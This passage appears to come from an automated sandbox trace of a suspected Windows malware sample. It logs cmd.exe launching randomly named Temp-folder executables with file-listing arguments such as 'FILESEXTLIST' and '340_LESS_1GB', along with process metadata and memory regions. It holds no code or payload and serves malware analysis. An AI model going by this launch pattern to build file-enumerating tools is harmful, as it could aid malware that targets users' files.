lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.949] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.949] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.949] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.949] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.965] _close (_FileHandle=4) returned 0 [0111.965] FindNextFileW (in: hFindFile=0x3b21d0, lpFindFileData=0x1cede0 | out: lpFindFileData=0x1cede0) returned 0 [0111.965] GetLastError () returned 0x12 [0111.965] FindClose (in: hFindFile=0x3b21d0 | out: hFindFile=0x3b21d0) returned 1 [0111.965] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0111.968] _close (_FileHandle=3) returned 0 [0111.968] GetConsoleTitleW (in: lpConsoleTitle=0x1cf27c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.968] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"" (normalized: 
"c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe\"")) returned 0xffffffff [0111.968] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0111.968] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0111.968] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0111.968] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0111.968] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0111.968] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0111.968] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0111.968] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0111.968] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0111.968] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0111.968] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0111.968] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0111.968] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0111.968] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0111.968] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0111.968] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0111.968] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0111.968] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0111.968] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0111.968] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0111.969] 
_wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0111.969] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0111.969] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0111.969] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0111.969] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0111.969] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0111.969] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0111.969] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0111.969] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0111.969] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0111.969] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0111.969] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0111.969] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0111.969] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0111.969] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0111.969] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0111.969] _wcsicmp (_String1="\"C", 
_String2="MD") returned -75 [0111.969] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0111.969] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0111.969] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0111.969] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0111.969] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0111.970] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0111.970] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0111.970] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0111.970] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0111.970] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0111.970] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0111.970] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0111.970] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0111.970] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0111.970] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0111.970] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0111.970] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0111.970] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0111.970] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0111.970] 
_wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0111.970] SetErrorMode (uMode=0x0) returned 0x0 [0111.970] SetErrorMode (uMode=0x1) returned 0x0 [0111.970] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3b0848, lpFilePart=0x1ced9c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x1ced9c*="Temp") returned 0x23 [0111.970] SetErrorMode (uMode=0x0) returned 0x1 [0111.970] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0111.971] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.973] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.973] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", fInfoLevelId=0x1, lpFindFileData=0x1ceb38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb38) returned 0x3b21d0 [0111.974] FindClose (in: hFindFile=0x3b21d0 | out: hFindFile=0x3b21d0) returned 1 [0111.974] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0111.974] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0111.974] GetConsoleTitleW (in: lpConsoleTitle=0x1cf010, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.046] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cee98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cef60 | out: lpAttributeList=0x1cee98, lpSize=0x1cef60) returned 1 [0112.046] UpdateProcThreadAttribute (in: lpAttributeList=0x1cee98, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cef58, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cee98, lpPreviousValue=0x0) returned 1 [0112.046] GetStartupInfoW (in: lpStartupInfo=0x1cee54 | out: lpStartupInfo=0x1cee54*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp 
(_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0112.047] lstrcmpW (lpString1="\\GYm4NxCU.exe", lpString2="\\XCOPY.EXE") returned -1 [0112.048] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ceef4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" 
\"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cef40 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessInformation=0x1cef40*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdb0, dwThreadId=0xdb4)) returned 1 [0112.968] CloseHandle (hObject=0x4c) returned 1 [0112.968] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0112.968] GetEnvironmentStringsW () returned 0x3b2dd0* [0112.968] FreeEnvironmentStringsW (penv=0x3b2dd0) returned 1 [0112.968] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0116.070] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cee34 | out: lpExitCode=0x1cee34*=0x0) returned 1 [0116.070] CloseHandle (hObject=0x50) returned 1 [0116.070] _vsnwprintf (in: _Buffer=0x1cef7c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cee40 | out: _Buffer="00000000") returned 8 [0116.070] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.070] GetEnvironmentStringsW () returned 0x3b2530* [0116.070] FreeEnvironmentStringsW (penv=0x3b2530) returned 1 [0116.070] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.070] GetEnvironmentStringsW () returned 0x3b2530* [0116.071] FreeEnvironmentStringsW (penv=0x3b2530) returned 1 [0116.071] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cee98 | out: lpAttributeList=0x1cee98) [0116.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) 
returned 1 [0116.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0116.071] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.071] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0116.071] SetConsoleInputExeNameW () returned 0x1 [0116.071] GetConsoleOutputCP () returned 0x1b5 [0116.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0116.071] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.071] exit (_Code=0) Process: id = "41" image_name = "bkm66byk.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe" page_root = "0x7ea16840" os_pid = "0xd5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0xd2c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6942 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6943 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6944 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 
6945 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "bkm66byk.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe") Region: id = 6946 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6947 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6948 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6949 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 6950 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 6951 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6952 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6953 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6954 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 6955 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6956 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6957 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6958 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6959 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6960 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6961 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6962 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 6963 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 6964 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6965 
start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7013 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7014 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7015 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 7016 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 7017 start_va = 0x1270000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 7158 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7159 start_va = 0x1270000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 7160 start_va = 0x13b0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 7166 start_va = 0x13c0000 end_va = 0x149efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013c0000" filename = "" Region: id = 7167 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7168 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" 
filename = "" Region: id = 7169 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 69 os_tid = 0xd60 [0112.054] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x80cc0520, dwHighDateTime=0x1d440a9)) [0112.054] GetCurrentProcessId () returned 0xd5c [0112.054] GetCurrentThreadId () returned 0xd60 [0112.054] GetTickCount () returned 0x26d52 [0112.054] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=16884285547) returned 1 [0112.054] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0112.054] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.055] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0112.055] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0112.055] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0112.055] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0112.055] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0112.056] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0112.056] GetCurrentThreadId () returned 0xd60 [0112.056] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", 
